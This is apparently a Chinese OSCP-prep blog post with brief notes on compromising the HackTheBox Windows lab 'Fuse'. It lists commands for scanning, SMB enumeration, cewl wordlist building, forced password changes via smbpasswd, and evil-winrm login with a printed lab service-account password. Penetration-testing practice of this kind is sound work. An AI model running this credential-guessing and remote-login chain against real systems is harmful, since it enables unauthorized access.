EthanDoctor

OSCP备考_0x55_HackThBox靶机_Windows_Fuse

Ethan医生5个月前靶场206

fuse

nmap -sCV -p- --min-rate 10000 -T4 -sS 10.129.2.5 (扫描TCP)

image.png

nslookup fabricorp.local  10.129.2.5

image.png

image.png


smbclient -L //10.129.2.5/ -N  

image.png


http://fuse.fabricorp.local/papercut/logs/html/index.htm

image.png

cewl -d 5 -m 3 -w password.txt http://fuse.fabricorp.local/papercut/logs/html/index.htm --with-numbers



smbclient -L //10.129.2.5 -U tlavel%Fabricorp01

image.png



错误:Cannot connect to server. Error was NT_STATUS_PASSWORD_MUST_CHANGE
需要用smbpasswd修改密码


sudo smbpasswd -r 10.129.235.28 -U tlavel

smbpasswd -r 10.129.235.28 bhult

更新密码后直接登入然后提权


evil-winrm -i 10.129.235.28 -u svc-print -p '$fab@s3Rv1ce$1'

image.png


标签: OSCP
返回列表

上一篇:OSCP备考_0x54_HackThBox靶机_Windows_remote

下一篇:OSCP备考_0x56_HackThBox靶机_Windows_worker

相关文章

OSCP备考_0x05_HackThBox靶机_Linux_Nineveh

OSCP备考_0x05_HackThBox靶机_Linux_Nineveh

信息收集nmap -sCV -p- --min-rate 10000 -T4 -sS 10.129.143.34 (扫描TCP)nmap -sU --top-ports 100 10.129...

OSCP备考_0x12_HackThBox靶机_Linux_irked

OSCP备考_0x12_HackThBox靶机_Linux_irked

nmap -sCV -p- --min-rate 10000 -T4 -sS 10.129.213.7 (扫描TCP)nmap -sU --top-ports 100 10.129.213....

OSCP备考_0x23_Vulnhub靶机_digitalworld.local: TORMENT

OSCP备考_0x23_Vulnhub靶机_digitalworld.local: TORMENT

名称说明靶机下载链接https://www.vulnhub.com/entry/digitalworldlocal-torment,299/攻击机(kali)ip:192.168.233.168靶机(...

OSCP备考_0x38_HackThBox靶机_Windows_Devel

OSCP备考_0x38_HackThBox靶机_Windows_Devel

nmap -sCV -p- --min-rate 10000 -T4 -sS 10.129.254.198 (扫描TCP)使用ftp进行连接ftp 10.129.254.198 2...

OSCP备考_0x24_HackThBox靶机_Linux_Traverxec

OSCP备考_0x24_HackThBox靶机_Linux_Traverxec

nmap -sCV -p- --min-rate 10000 -T4 -sS 10.129.21.112 (扫描TCP)nmap -sU --top-ports 100 ...

OSCP备考_0x26_HackThBox靶机_Linux_magic

OSCP备考_0x26_HackThBox靶机_Linux_magic

nmap -sCV -p- --min-rate 10000 -T4 -sS 10.129.216.125 (扫描TCP)nmap -sU --top-ports 100 ...

发表评论    

◎欢迎参与讨论,请在这里发表您的看法、交流您的观点。

Copyright Your hacksec.top Rights Reserved.

Powered By Z-BlogPHP. - 鄂ICP备2025099786号